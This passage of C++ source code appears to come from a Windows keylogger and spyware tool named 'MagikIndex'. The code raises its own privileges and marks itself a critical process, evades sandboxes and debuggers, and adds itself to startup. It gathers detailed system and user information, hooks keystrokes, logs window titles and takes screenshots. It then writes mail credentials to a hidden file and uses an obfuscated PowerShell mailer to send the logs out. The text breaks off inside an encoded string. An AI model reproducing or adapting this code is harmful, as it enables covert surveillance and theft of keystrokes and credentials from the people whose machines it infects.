86 | VersionFileIO.close(); 87 | DeleteFileA(VersionFile.c_str()); 88 | VersionFile = "/C timeout 3 /nobreak > Nul & start " + UpdatedExe; 89 | ShellExecuteA(0, "open", "cmd.exe", VersionFile.c_str(), 0, SW_HIDE); 90 | FinalExit(); 91 | } 92 | else { 93 | VersionFileIO.close(); 94 | DeleteFileA(VersionFile.c_str()); 95 | } 96 | } 97 | else { 98 | VersionFileIO.close(); 99 | DeleteFileA(VersionFile.c_str()); 100 | if (!ThrowAwayFlag) { 101 | ThrowAwayFlag = true; 102 | VersionFileIO.close(); 103 | goto VersionDownload; 104 | } 105 | VersionFileIO.close(); 106 | } 107 | } 108 | 109 | if (IsElevated()) { 110 | HANDLE hToken; 111 | LUID luid; 112 | LookupPrivilegeValueA(NULL, SE_DEBUG_NAME, &luid); 113 | TOKEN_PRIVILEGES tp; 114 | tp.Privileges[0].Luid = luid; 115 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 116 | tp.PrivilegeCount = 1; 117 | OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken); 118 | AdjustTokenPrivileges(hToken, false, &tp, sizeof(tp), NULL, NULL); 119 | HANDLE ntdll = LoadLibrary("ntdll.dll"); 120 | RtlSetProcessIsCritical SetCriticalProcess; 121 | SetCriticalProcess = (RtlSetProcessIsCritical)GetProcAddress((HINSTANCE)ntdll, "RtlSetProcessIsCritical"); 122 | SetCriticalProcess(TRUE, NULL, FALSE); 123 | } 124 | 125 | Log: 126 | 127 | Counter = 0; 128 | mutex = false; 129 | 130 | MyLog.CreateLog(); 131 | 132 | DWORD Tick = GetTickCount(); 133 | 134 | std::string VersionText = "MagikIndex "; 135 | std::string TimeText = "Current Tick:"; 136 | std::string ComputerText = "Host Name:"; 137 | std::string UsernameText = "User Name:"; 138 | std::string PrivilegeText = "Privilege:"; 139 | std::string InternetText = "Internet Status:"; 140 | std::string WidthText = "Screen Width:"; 141 | std::string HeightText = "Screen Height:"; 142 | std::string AspectRatioText = "Aspect Ratio:"; 143 | std::string WindowsText = "Windows Version:"; 144 | std::string OEMText = "OEM Number:"; 145 | std::string CPUNumberText = "Number Of Cores:"; 146 | std::string CPUTypeText = "CPU Type:"; 147 | std::string CPUBrand = "CPU Brand And Model:"; 148 | std::string GPUBrand = "GPU Brand And Model:"; 149 | std::string GenuineText = "Genuine Windows:"; 150 | std::string SlowText = "Low-End CPU:"; 151 | std::string MouseText = "Number Of Mouse Buttons:"; 152 | std::string MonitorText = "Number Of Monitors:"; 153 | std::string LanguageText = "Install Language:"; 154 | std::string CurrencyText = "Install Currency:"; 155 | std::string MiddleEastText = "Middle-East PC:"; 156 | std::string BootText = "Normal Boot:"; 157 | std::string RAMText = "RAM Size:"; 158 | std::string SeedText = "Randomness Seed:"; 159 | std::string CryptText = "Encrypted with "; 160 | std::string DiskText = "Found partitions:\n"; 161 | std::string IPText = "External IP:"; 162 | std::string OSText = "OS Name:"; 163 | std::string ManufacturerText = "Manufacturer:"; 164 | std::string InstallDateText = "Install Date:"; 165 | std::string SystemDeviceText = "System Device:"; 166 | std::string MotherBoardText = "Motherboard:"; 167 | std::string BIOSText = "BIOS:"; 168 | std::string HDDText = "Hard Disk:"; 169 | std::string DomainText; 170 | 171 | VersionText += CurrentVersion; 172 | VersionText += IsMajor ? " Major Release - " : " Minor/Dev Release - "; 173 | 174 | char* AppData = nullptr; 175 | size_t AppDataSize; 176 | _dupenv_s(&AppData, &AppDataSize, "APPDATA"); 177 | 178 | std::string LogTime = std::to_string(Tick); 179 | 180 | SYSTEMTIME SysTime; 181 | char TimeBuffer[512]; 182 | ZeroMemory(&TimeBuffer, sizeof(TimeBuffer)); 183 | GetLocalTime(&SysTime); 184 | 185 | std::string StartDate = "_________" + VersionText; 186 | StartDate += std::to_string(SysTime.wDay); 187 | StartDate += "/"; 188 | StartDate += std::to_string(SysTime.wMonth); 189 | StartDate += "/"; 190 | StartDate += std::to_string(SysTime.wYear); 191 | StartDate += " "; 192 | StartDate += std::to_string(SysTime.wHour); 193 | StartDate += ":"; 194 | StartDate += std::to_string(SysTime.wMinute); 195 | StartDate += ":"; 196 | StartDate += std::to_string(SysTime.wSecond); 197 | StartDate += "_________\n"; 198 | 199 | MyLog.LogItChar(MyLogo); 200 | MyLog.LogItChar("\n"); 201 | MyLog.LogItChar(StartDate); 202 | 203 | if (!CryptLogs) { 204 | MyLog.LogItChar("#\n#/!\\STARTED IN DEBUG MODE/!\\\n#"); 205 | MyLog.LogItChar("Not crypting the logs..."); 206 | } 207 | else { 208 | MyLog.LogItChar("Started in normal mode..."); 209 | CryptText += "Secure Random Key Shift..."; 210 | MyLog.LogItChar(CryptText); 211 | } 212 | 213 | if (FirstLog) { 214 | if (Trust.IsResCheck) 215 | MyLog.LogItChar("Resolution ratio mismatch, trust decreased..."); 216 | if (Trust.IsInVM) 217 | MyLog.LogItChar("VM Guest specific files found, trust decreased..."); 218 | if (Trust.IsHostingAVM) 219 | MyLog.LogItChar("VM Host specific files found, trust increased..."); 220 | if (Trust.IsSmallHardDrive) 221 | MyLog.LogItChar("HardDrive is under the set minimum, trust decreased..."); 222 | if (Trust.IsSmallRAM) 223 | MyLog.LogItChar("RAM is under the set minimum, trust decreased..."); 224 | if (Trust.IsBeingDebugged) 225 | MyLog.LogItChar("Process is being debugged, trust decreased..."); 226 | if (Trust.HasOneCore) 227 | MyLog.LogItChar("CPU Core Number is under the set minimum, trust decreased..."); 228 | if (Trust.HasMultipleMonitors) 229 | MyLog.LogItChar("Multiple monitor setup found, trust increased..."); 230 | if (Trust.HasBeenTimepatched) 231 | MyLog.LogItChar("Process has been timepatched, trust decreased..."); 232 | if (Trust.UserIsInactive) 233 | MyLog.LogItChar("User's mouse hasn't moved for 10s, trust decreased..."); 234 | if (Trust.HasActiveInternet) 235 | MyLog.LogItChar("Active internet connection found, trust increased..."); 236 | if (Trust.Proxied) 237 | MyLog.LogItChar("Proxy/Fake connection found, trust decreased..."); 238 | if (Trust.HasRunningAntiMalware) 239 | MyLog.LogItChar("Running Anti-Malware solution found, trust increased..."); 240 | if (Trust.HasMoreThan20Apps) 241 | MyLog.LogItChar("More than 20 apps installed, trust increased..."); 242 | if (Trust.ExtUserActivity) 243 | MyLog.LogItChar("No user input in the past 15s, trust decreased..."); 244 | } 245 | 246 | if (TrustTooLow) { 247 | MyLog.LogItChar("Trust factor:" + std::to_string(DebugItem.trust)); 248 | MyLog.LogItChar("Trust factor too low, quitting..."); 249 | MyLog.SendLog(); 250 | FinalExit(); //could just act normal instead of autodeleting, which is sus 251 | } 252 | 253 | DWORD Size = MAX_LENGTH + 1; 254 | char HostName[MAX_LENGTH + 1]; 255 | std::string UserNameT = QueryWMI("SELECT * FROM Win32_ComputerSystem", L"Username", 1); 256 | std::string::size_type pos1 = std::string(UserNameT).find_last_of("\\/"); 257 | std::string UserName = std::string(UserNameT).substr(pos1 + 1, UserNameT.size()); 258 | std::string InternetStatusString = "Not connected, error: "; 259 | 260 | DWORD DWFlags; 261 | 262 | //if (InternetCheckConnectionA("https://www.google.com", FLAG_ICC_FORCE_CONNECTION, 0)) { //switch between these two ways to check as you see fit, or even use both 263 | if (InternetGetConnectedState(&DWFlags, NULL)) { 264 | InternetStatusString = "Connected"; 265 | } 266 | else { 267 | InternetStatusString += std::to_string(GetLastError()); 268 | InternetStatusString += ", returned flags: "; 269 | InternetStatusString += std::to_string(DWFlags); 270 | } 271 | 272 | GetComputerNameA(HostName, &Size); 273 | 274 | if (FirstLog) { 275 | MyLog.LogItChar("First log of the session, copying files and adding to startup..."); 276 | FirstSetup(); 277 | } 278 | else { 279 | MyLog.LogItChar("Not the first log of the session, skip copying files..."); 280 | } 281 | 282 | //fetch various System Metrics 283 | int x1, y1, x2, y2; 284 | x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); 285 | y1 = GetSystemMetrics(SM_YVIRTUALSCREEN); 286 | x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN); 287 | y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN); 288 | std::string BootMode = (GetSystemMetrics(SM_CLEANBOOT) != 0) ? "No" : "Yes"; 289 | std::string SlowMachine = (GetSystemMetrics(SM_SLOWMACHINE) != 0) ? "Yes" : "No"; 290 | std::string MiddleEast = (GetSystemMetrics(SM_MIDEASTENABLED) != 0) ? "Yes" : "No"; 291 | double Ratioed = (double)((x2 - x1) / (y2 - y1)); 292 | std::string Width = std::to_string((x2 - x1)); 293 | std::string Height = std::to_string((y2 - y1)); 294 | std::string Monitors = std::to_string(GetSystemMetrics(SM_CMONITORS)); 295 | std::string MouseButtons = std::to_string(GetSystemMetrics(SM_CMOUSEBUTTONS)); 296 | 297 | //fetch Windows version using 2 different APIs 298 | std::string WindowsVersion = "Unknown"; 299 | PBYTE WKSTAPointer; 300 | WKSTA_INFO_100 WKSTABuf; 301 | NetWkstaGetInfo(NULL, 100, &WKSTAPointer); 302 | memcpy(&WKSTABuf, WKSTAPointer, sizeof(WKSTABuf)); 303 | WindowsVersion = IsWindowsXPOrGreater() ? "XP " : WindowsVersion; 304 | WindowsVersion = IsWindows7OrGreater() ? "7 " : WindowsVersion; 305 | WindowsVersion = IsWindows7SP1OrGreater() ? "7 SP1 " : WindowsVersion; 306 | WindowsVersion = IsWindows8OrGreater() ? "8 " : WindowsVersion; 307 | WindowsVersion = IsWindows8Point1OrGreater() ? "8.1 " : WindowsVersion; 308 | WindowsVersion = IsWindows10OrGreater() ? "10 " : WindowsVersion; 309 | WindowsVersion = IsWindowsServer() ? "Server " : WindowsVersion; 310 | WindowsVersion += WKSTABuf.wki100_ver_major; 311 | WindowsVersion += "."; 312 | WindowsVersion += WKSTABuf.wki100_ver_minor; 313 | 314 | //fetch ram 315 | SYSTEM_INFO siSysInfo; 316 | GetSystemInfo(&siSysInfo); 317 | MEMORYSTATUSEX RAMStatus; 318 | RAMStatus.dwLength = sizeof(RAMStatus); 319 | GlobalMemoryStatusEx(&RAMStatus); 320 | std::string OEMNumber = std::to_string(siSysInfo.dwOemId); 321 | std::string CPUCores = std::to_string(siSysInfo.dwNumberOfProcessors / 2); 322 | std::string CPUType = std::to_string(siSysInfo.dwProcessorType); 323 | std::string RAMAmount = std::to_string((RAMStatus.ullTotalPhys / 1024) / 1024); 324 | 325 | //fetch autenthication status 326 | CONST SLID AppId = WINDOWS_SLID; 327 | SL_GENUINE_STATE GenuineState; 328 | std::string IsGenuine = (SLIsGenuineLocal(&AppId, &GenuineState, NULL) == S_OK && GenuineState != SL_GEN_STATE_IS_GENUINE) ? "No" : "Yes"; 329 | 330 | 331 | //fetch language and currency 332 | char LanguageIdentifier[100]; 333 | char CurrIdentifier[100]; 334 | GetLocaleInfo(GetSystemDefaultUILanguage(), LOCALE_SENGLANGUAGE, LanguageIdentifier, sizeof(LanguageIdentifier)); 335 | GetLocaleInfo(GetSystemDefaultUILanguage(), LOCALE_SENGCURRNAME, CurrIdentifier, sizeof(CurrIdentifier)); 336 | 337 | PrivilegeText += IsElevated() ? "Elevated" : "Standard"; 338 | 339 | TimeText += LogTime; 340 | MyLog.LogItChar(TimeText); 341 | 342 | ComputerText += HostName; 343 | MyLog.LogItChar(ComputerText); 344 | 345 | UsernameText += UserName; 346 | MyLog.LogItChar(UsernameText); 347 | 348 | OSText += QueryWMI("SELECT * FROM Win32_OperatingSystem", L"Caption", 1); 349 | MyLog.LogItChar(OSText); 350 | 351 | ManufacturerText += QueryWMI("SELECT * FROM Win32_OperatingSystem", L"Manufacturer", 1); 352 | MyLog.LogItChar(ManufacturerText); 353 | 354 | InstallDateText += QueryWMI("SELECT * FROM Win32_OperatingSystem", L"InstallDate", 1); 355 | MyLog.LogItChar(InstallDateText); 356 | 357 | SystemDeviceText += QueryWMI("SELECT * FROM Win32_OperatingSystem", L"SystemDevice", 1); 358 | MyLog.LogItChar(SystemDeviceText); 359 | 360 | MotherBoardText += QueryWMI("SELECT * FROM Win32_BaseBoard", L"Manufacturer", 1); 361 | MotherBoardText += " "; 362 | MotherBoardText += QueryWMI("SELECT * FROM Win32_BaseBoard", L"Product", 1); 363 | MotherBoardText += " "; 364 | MotherBoardText += QueryWMI("SELECT * FROM Win32_BaseBoard", L"Version", 1); 365 | MotherBoardText += " "; 366 | MotherBoardText += QueryWMI("SELECT * FROM Win32_BaseBoard", L"SerialNumber", 1); 367 | MyLog.LogItChar(MotherBoardText); 368 | 369 | BIOSText += QueryWMI("SELECT * FROM Win32_BIOS", L"Manufacturer", 1); 370 | BIOSText += " "; 371 | BIOSText += QueryWMI("SELECT * FROM Win32_BIOS", L"Name", 1); 372 | BIOSText += " "; 373 | BIOSText += QueryWMI("SELECT * FROM Win32_BIOS", L"SerialNumber", 1); 374 | MyLog.LogItChar(BIOSText); 375 | 376 | HDDText += " Model:"; 377 | HDDText += QueryWMI("SELECT * FROM Win32_DiskDrive", L"Model", 1); 378 | HDDText += " Path:"; 379 | HDDText += QueryWMI("SELECT * FROM Win32_DiskDrive", L"Name", 1); 380 | HDDText += " SN:"; 381 | HDDText += QueryWMI("SELECT * FROM Win32_DiskDrive", L"SerialNumber", 1); 382 | HDDText += " Size:"; 383 | HDDText += QueryWMI("SELECT * FROM Win32_DiskDrive", L"Size", 2); 384 | HDDText += "Bytes"; 385 | MyLog.LogItChar(HDDText); 386 | 387 | InternetText += InternetStatusString; 388 | MyLog.LogItChar(InternetText); 389 | 390 | if (Trust.HasActiveInternet) 391 | IPText += RetrieveExternalIp(CurrentDir); 392 | else 393 | IPText += "Offline"; 394 | MyLog.LogItChar(IPText); 395 | 396 | WidthText += Width; 397 | MyLog.LogItChar(WidthText); 398 | 399 | HeightText += Height; 400 | MyLog.LogItChar(HeightText); 401 | 402 | AspectRatioText += std::to_string(Ratioed); 403 | MyLog.LogItChar(AspectRatioText); 404 | 405 | WindowsText += WindowsVersion; 406 | MyLog.LogItChar(WindowsText); 407 | 408 | OEMText += OEMNumber; 409 | MyLog.LogItChar(OEMText); 410 | 411 | RAMText += RAMAmount; 412 | RAMText += " MB"; 413 | MyLog.LogItChar(RAMText); 414 | 415 | CPUTypeText += CPUType; 416 | MyLog.LogItChar(CPUTypeText); 417 | 418 | CPUBrand += GetCpuInfo(); 419 | CPUBrand += " x"; 420 | CPUBrand += CPUCores; 421 | CPUBrand += ", "; 422 | CPUBrand += QueryWMI("SELECT * FROM Win32_Processor", L"CurrentVoltage", 2); 423 | CPUBrand += "v, "; 424 | CPUBrand += QueryWMI("SELECT * FROM Win32_Processor", L"LoadPercentage", 2); 425 | CPUBrand += "% Load"; 426 | //CPUBrand += QueryWMI("SELECT * FROM Win32_Processor", L"SerialNumber", 1); 427 | MyLog.LogItChar(CPUBrand); 428 | 429 | GPUBrand += QueryWMI("SELECT * FROM Win32_VideoController", L"Caption", 1); 430 | MyLog.LogItChar(GPUBrand); 431 | 432 | GenuineText += IsGenuine; 433 | MyLog.LogItChar(GenuineText); 434 | 435 | MouseText += MouseButtons; 436 | MyLog.LogItChar(MouseText); 437 | 438 | MonitorText += Monitors; 439 | MyLog.LogItChar(MonitorText); 440 | 441 | BootText += BootMode; 442 | MyLog.LogItChar(BootText); 443 | 444 | SlowText += SlowMachine; 445 | MyLog.LogItChar(SlowText); 446 | 447 | LanguageText += LanguageIdentifier; 448 | MyLog.LogItChar(LanguageText); 449 | 450 | CurrencyText += CurrIdentifier; 451 | MyLog.LogItChar(CurrencyText); 452 | 453 | MiddleEastText += MiddleEast; 454 | MyLog.LogItChar(MiddleEastText); 455 | 456 | SeedText += std::to_string(RandSeed); 457 | MyLog.LogItChar(SeedText); 458 | 459 | DWORD DriveMask = GetLogicalDrives(); 460 | 461 | for (int i = 0; i < 26; i++) { 462 | std::string DriveLetter = {}; 463 | DriveLetter += (char)(i + (int)'A'); 464 | DriveLetter += ":\\"; 465 | ULARGE_INTEGER DiskSize; 466 | UINT DriveType = GetDriveTypeA(DriveLetter.c_str()); 467 | //MessageBoxA(NULL,std::to_string(DriveType).c_str(), DriveLetter.c_str(),MB_OK); 468 | if ((DriveMask & (1 << i))) { 469 | if (DriveType != DRIVE_UNKNOWN && DriveType != DRIVE_NO_ROOT_DIR) { 470 | if (GetDiskFreeSpaceExA(DriveLetter.c_str(), NULL, &DiskSize, NULL) || (DriveType != DRIVE_CDROM && DriveType != DRIVE_REMOVABLE)) { 471 | DiskText += (char)(i + (int)'A'); 472 | DiskText += ":\\ Type:"; 473 | DiskText += std::to_string(DriveType); 474 | DiskText += " Size:"; 475 | DiskText += std::to_string((DiskSize.QuadPart / 1073741824)); 476 | DiskText += "GB,\n"; 477 | DiskSize.QuadPart = 0; 478 | } 479 | } 480 | } 481 | } 482 | DiskText.erase(DiskText.size() - 2); 483 | DiskText += "\n"; 484 | MyLog.LogItChar(DiskText); 485 | 486 | MyLog.LogItChar("_____________________________________________\nList of existing users: \n"); 487 | 488 | 489 | DomainText = QueryWMI("SELECT * from Win32_UserAccount", L"FullName", 1); 490 | MyLog.LogItChar(DomainText); 491 | 492 | 493 | MyLog.LogItChar("_____________________________________________\nList of running processes: \n"); 494 | 495 | HANDLE hpSnap; 496 | PROCESSENTRY32 pentry; 497 | hpSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 498 | if (hpSnap != INVALID_HANDLE_VALUE) { 499 | pentry.dwSize = sizeof(PROCESSENTRY32); 500 | } 501 | else { 502 | return false; 503 | } 504 | if (!Process32First(hpSnap, &pentry)) { 505 | CloseHandle(hpSnap); 506 | return false; 507 | } 508 | do { 509 | MyLog.LogItChar(pentry.szExeFile); 510 | } while (Process32Next(hpSnap, &pentry)); 511 | 512 | MyLog.LogItChar("_____________________________________________\nList of device drivers: \n"); 513 | 514 | LPVOID drivers[1024]; 515 | DWORD cbNeeded; 516 | int cDrivers, i; 517 | if (K32EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) 518 | { 519 | char szDriver[1024]; 520 | cDrivers = cbNeeded / sizeof(drivers[0]); 521 | for (i = 0; i < cDrivers; i++) 522 | { 523 | if (K32GetDeviceDriverBaseNameA(drivers[i], szDriver, sizeof(szDriver) / sizeof(szDriver[0]))) 524 | { 525 | MyLog.LogItChar(szDriver); 526 | } 527 | } 528 | } 529 | else 530 | { 531 | MyLog.LogItChar("Not enough memory for driver enumeration."); 532 | } 533 | 534 | MyLog.LogItChar("\n_____________________________________________\n"); 535 | 536 | 537 | std::thread t1(Hooker, WH_KEYBOARD_LL, KeyboardThread); 538 | std::thread t2(TimerThread); 539 | t2.detach(); 540 | t1.detach(); 541 | //t1.detach(); 542 | Sleep(50); 543 | char OldWindowTitle[256]; 544 | char WindowTitle[256]; 545 | while (!mutex) { 546 | GetWindowTextA(GetForegroundWindow(), WindowTitle, sizeof(WindowTitle)); 547 | if (strcmp(WindowTitle, OldWindowTitle) != 0) { 548 | memset(OldWindowTitle, 0, sizeof(OldWindowTitle)); 549 | strcpy(OldWindowTitle, WindowTitle); 550 | std::string ContextSwitchText = "[Switched to \""; 551 | ContextSwitchText += WindowTitle; 552 | ContextSwitchText += "\"]"; 553 | MyLog.LogItChar(ContextSwitchText); 554 | Counter += ContextSwitchText.size(); 555 | } 556 | Sleep(50); 557 | } 558 | MyLog.LogItChar("\n_____________________________________________\n"); 559 | if (LogMode == 2) 560 | MyLog.LogItChar("Character limit hit, sending log..."); 561 | else if (LogMode == 1) 562 | MyLog.LogItChar("Timer limit hit, sending log..."); 563 | 564 | MyLog.SendLog(); 565 | FirstLog = false; 566 | 567 | goto Log; 568 | return 0; 569 | } 570 | 571 | void DeleteDirectory(std::string dir) 572 | { 573 | dir += "\0"; 574 | SHFILEOPSTRUCTA file_op = { NULL, FO_DELETE, dir.c_str(), NULL, FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT, false, 0, "" }; 575 | SHFileOperationA(&file_op); 576 | return; 577 | } 578 | 579 | void createTextFile(const std::string& filename, const std::string& line1, const std::string& line2, const std::string& line3, const std::string& line4, const std::string& line5) { 580 | // Create the file with the FILE_ATTRIBUTE_HIDDEN attribute 581 | HANDLE file = CreateFileA(filename.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL); 582 | DWORD writtenBytes; 583 | WriteFile(file, line1.c_str(), (DWORD)line1.size(), &writtenBytes, NULL); 584 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 585 | 586 | WriteFile(file, line2.c_str(), (DWORD)line2.size(), &writtenBytes, NULL); 587 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 588 | 589 | WriteFile(file, line3.c_str(), (DWORD)line3.size(), &writtenBytes, NULL); 590 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 591 | 592 | WriteFile(file, line4.c_str(), (DWORD)line4.size(), &writtenBytes, NULL); 593 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 594 | 595 | WriteFile(file, line5.c_str(), (DWORD)line5.size(), &writtenBytes, NULL); 596 | WriteFile(file, "\r\n", 2, &writtenBytes, NULL); 597 | 598 | // Close the file 599 | CloseHandle(file); 600 | } 601 | 602 | void TakeScreenShot(const char* filename) 603 | { 604 | int x1, y1, x2, y2, w, h; 605 | 606 | // get screen dimensions 607 | x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); 608 | y1 = GetSystemMetrics(SM_YVIRTUALSCREEN); 609 | x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN); 610 | y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN); 611 | w = x2 - x1; 612 | h = y2 - y1; 613 | 614 | // copy screen to bitmap 615 | HDC hScreen = GetDC(NULL); 616 | HDC hDC = CreateCompatibleDC(hScreen); 617 | HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, (ScreenshotCrop ? DestWidth : w), (ScreenshotCrop ? DestHeight : h)); 618 | HGDIOBJ old_obj = SelectObject(hDC, hBitmap); 619 | BOOL bRet = StretchBlt(hDC, x1, y1, (ScreenshotCrop ? DestWidth : w), (ScreenshotCrop ? DestHeight : h), hScreen, x1, y1, w, h, SRCCOPY); 620 | 621 | //include mouse pointer inside the screenshot(if it is displayed) 622 | HWND hwnd = GetDesktopWindow(); 623 | CURSORINFO cursor = { sizeof(cursor) }; 624 | GetCursorInfo(&cursor); 625 | if (cursor.flags == CURSOR_SHOWING) { 626 | RECT rect; 627 | GetWindowRect(hwnd, &rect); 628 | ICONINFO info = { sizeof(info) }; 629 | GetIconInfo(cursor.hCursor, &info); 630 | const int x = cursor.ptScreenPos.x - rect.left - rect.left - info.xHotspot; 631 | const int y = cursor.ptScreenPos.y - rect.top - rect.top - info.yHotspot; 632 | BITMAP bmpCursor = { 0 }; 633 | GetObject(info.hbmColor, sizeof(bmpCursor), &bmpCursor); 634 | DrawIconEx(hDC, x, y, cursor.hCursor, bmpCursor.bmWidth, bmpCursor.bmHeight, 635 | 0, NULL, DI_NORMAL); 636 | } 637 | 638 | SaveHBITMAPToFile(hBitmap, filename); 639 | //CLEAN 640 | SelectObject(hDC, old_obj); 641 | DeleteDC(hDC); 642 | ReleaseDC(NULL, hScreen); 643 | DeleteObject(hBitmap); 644 | }; 645 | 646 | BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) 647 | { 648 | std::string base64; 649 | HDC hDC; 650 | int iBits; 651 | WORD wBitCount; 652 | DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0; 653 | BITMAP Bitmap0; 654 | BITMAPFILEHEADER bmfHdr; 655 | BITMAPINFOHEADER bi; 656 | LPBITMAPINFOHEADER lpbi; 657 | HANDLE fh, hDib, hPal, hOldPal2 = NULL; 658 | hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL); 659 | iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES); 660 | DeleteDC(hDC); 661 | if (iBits <= 1) 662 | wBitCount = 1; 663 | else if (iBits <= 4) 664 | wBitCount = 4; 665 | else if (iBits <= 8) 666 | wBitCount = 8; 667 | else 668 | wBitCount = 24; 669 | GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0); 670 | bi.biSize = sizeof(BITMAPINFOHEADER); 671 | bi.biWidth = Bitmap0.bmWidth; 672 | bi.biHeight = -Bitmap0.bmHeight; 673 | bi.biPlanes = 1; 674 | bi.biBitCount = wBitCount; 675 | bi.biCompression = BI_RGB; 676 | bi.biSizeImage = 0; 677 | bi.biXPelsPerMeter = 0; 678 | bi.biYPelsPerMeter = 0; 679 | bi.biClrImportant = 0; 680 | bi.biClrUsed = 256; 681 | dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8 682 | * Bitmap0.bmHeight; 683 | hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER)); 684 | lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib); 685 | *lpbi = bi; 686 | 687 | hPal = GetStockObject(DEFAULT_PALETTE); 688 | if (hPal) 689 | { 690 | hDC = GetDC(NULL); 691 | hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE); 692 | RealizePalette(hDC); 693 | } 694 | 695 | 696 | GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER) 697 | + dwPaletteSize, (BITMAPINFO*)lpbi, DIB_RGB_COLORS); 698 | 699 | if (hOldPal2) 700 | { 701 | SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE); 702 | RealizePalette(hDC); 703 | ReleaseDC(NULL, hDC); 704 | } 705 | 706 | fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 707 | FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); 708 | 709 | if (fh == INVALID_HANDLE_VALUE) 710 | return FALSE; 711 | 712 | bmfHdr.bfType = 0x4D42; // "BM" 713 | dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; 714 | bmfHdr.bfSize = dwDIBSize; 715 | bmfHdr.bfReserved1 = 0; 716 | bmfHdr.bfReserved2 = 0; 717 | bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; 718 | /* 719 | base64.append("

= 0; i--) { 739 | OtherString += Ret[i] + 1; 740 | } 741 | return OtherString.c_str(); 742 | } 743 | 744 | void RunPS1File(const std::string& ZipPath1) 745 | { 746 | char tempPath[MAX_PATH]; 747 | GetEnvironmentVariable("TEMP", tempPath, MAX_PATH); 748 | std::string fullPath = tempPath; 749 | std::string Filename = "mat-debug-"; 750 | Filename += std::to_string(rand() % 10000 + 1000); 751 | Filename += ".log"; 752 | fullPath += "\\" + Filename; 753 | createTextFile(fullPath, SendersEmail, SendersPsw, ZipPath1, EmailSubject, EmailBody); 754 | 755 | std::string Command = "/C powershell "; 756 | char SysDir[MAX_PATH]; 757 | GetSystemDirectoryA(SysDir, MAX_PATH); 758 | DWORD WrittenBytes, DWFlags; 759 | char* AppData = nullptr; 760 | size_t AppDataSize; 761 | strcat_s(SysDir, MAX_PATH, "\\cmd.exe"); 762 | _dupenv_s(&AppData, &AppDataSize, "APPDATA"); 763 | std::string Powershell = AppData; 764 | Powershell += "\\MicrosoftApps"; 765 | Powershell += "\\PSScript"; 766 | Powershell += std::to_string(GetTickCount()); 767 | Powershell += ".PS1"; 768 | std::string PSStartup = "MagikMailer"; 769 | PSStartup += std::to_string(GetTickCount()); 770 | HANDLE PS1File = CreateFileA(Powershell.c_str(), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 771 | std::string a = "$credsPath = \"$env:TEMP\\"; 772 | a += Filename; 773 | a += "\"\n"; 774 | a += HardDecode("ShMSZc6XoE9rS\\|zY\\M2pE2nIgnrS\\vHoVw;Yc2H4[x\\pdL7kdxnIfjP4d47WU73GLi2Y\\2nWNn\\5dvXoWMW4[{;oTvCEc2HIW|TY\\{PILi2Y\\2nWNn\\5dvXoWMmEdrHYdHTpexDZ\\UTEMm7Y\\V7{do7YUSTXVVTkEriIfjDHerrHLqSI\\D7{e27Y\\vj4[jTJfD7EdrHYdHTpexDZ\\UTkE7T4dETEK;CUgm;oSwyYcj3YT2L5dyXoWmqCflXockX5WmCURiS5[nro[3PnNunY[vXGf{;IenLHLMmEdrHYdnTEMmTYSw:IXwyYcj3YT2L5dyXoWmqCdrHYdnTEK;CUdxLpTwyYcj3YT2L5dyXoWmqS\\pH4e|XYVunY[P7EdrHYVwSZ\\Q7UdnT5e7PHK2PY\\sL4VveZ\\QDURiyYcj3YT2L5dyXoWmqSMmL5d5P5ejDJLiyEdrHYdnTEMuHYc27Y\\mXoeFvoexfJfn7mN2XoVw2Y\\2PZgVDEflXock;WN5XoVi2FK|zY[rTpdnTY\\{PmNx\\odLDHXPPHLMWYf{TJLi2FKuP5Wnzo[j7YTw:o\\wnGWW32WmqSM5iVPiyken\\penPHe234WmiEfwXYcuPGe234WwyYcj3mN2XoViS5[nro[R3{fn7GK;C{do7YUSTXVVTkEp24dl7EdrHYdp7Ee234epCURiKZ\\4LZ\\VDHXPPHLMupErWodrzodxTEMi[YcMSZ\\rXZWvCUOiSpd3;4SvCEQwilN66EQi64drT5[n7odxPYN2PZ\\2DURiWodrzodxTkEfT|Y|XodrzILi2FK7T4dETkEfP|Y|XodrzILi2FK2